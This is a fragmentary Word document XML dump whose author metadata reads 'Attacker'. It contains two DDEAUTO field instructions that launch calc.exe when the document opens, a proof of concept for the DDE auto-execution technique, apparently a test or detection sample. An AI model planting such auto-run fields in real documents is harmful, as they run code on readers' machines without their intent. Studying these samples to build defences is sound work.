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544F49" w:rsidRDefault="000603A6">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO "c:\\windows\\system32\\calc.exe" "/c calc.exe" \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="002962BE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002962BE">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002962BE">
        <w:instrText xml:space="preserve"> DDEAUTO "c:\\windows\\system32\\calc.exe" "/c calc.exe" \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="002962BE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002962BE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00544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altName w:val="Arial"/>
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000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5D7B"/>
    <w:rsid w:val="000603A6"/>
    <w:rsid w:val="002962BE"/>
    <w:rsid w:val="00544F49"/>
    <w:rsid w:val="00751249"/>
    <w:rsid w:val="00997261"/>
    <w:rsid w:val="00A63AE1"/>
    <w:rsid w:val="00E55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B56C3E-461D-457B-9113-6D166F023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Attacker</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Attacker</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-05T18:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-05T18:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>